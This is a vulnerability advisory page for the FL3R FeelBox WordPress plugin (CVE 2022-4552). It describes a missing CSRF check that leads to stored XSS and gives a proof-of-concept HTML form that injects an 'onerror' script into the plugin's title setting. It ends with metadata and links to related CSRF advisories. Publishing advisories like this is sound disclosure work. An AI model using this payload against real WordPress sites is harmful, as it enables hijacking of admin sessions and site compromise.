FL3R FeelBox <= 8.1 – Settings Update via CSRF to Stored XSS | CVE 2022-4552 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when updating its settings, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack

Proof of Concept

Make a logged in admin open a page containing the HTML code below

<form action="https://example.com/wp-admin/options-general.php?page=feelbox" method="POST">
    <input type="text" name="feelbox_submit_hidden" value="Y">
    <input type="text" name="fl3rfeelboxtitle" value='Do you like this post?"><img src onerror=alert(/XSS/)>'>
    <input type="submit" name="submit" value="submit">
</form>

Affects Plugins

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

WPScan

Verified

Yes

WPVDB ID

307b0fe4-39de-4fbb-8bb0-f7f15ec6ef52

Timeline

Publicly Published

2023-01-04 (about 1 years ago)

Added

2023-01-04 (about 1 years ago)

Last Updated

2023-01-04 (about 1 years ago)

Other

Published

Title

Published

2020-02-24

Title

Ultimate Membership Pro < 8.7 - Cross-Site Request Forgery allowing Arbitrary Account Deletion and Creation

Published

2024-04-04

Title

Classified Listing < 3.0.5 - Cross-Site Request Forgery to Account Takeover via rtcl_update_user_account

Published

2023-01-24

Title

Intuitive Custom Post Order < 3.1.4 - Arbitrary Menu Order Update via CSRF

Published

2024-04-05

Title

Sumo < 1.35 - Cross-Site Request Forgery

Published

2023-10-24

Title

Quill Forms < 3.4.0 - Cross-Site Request Forgery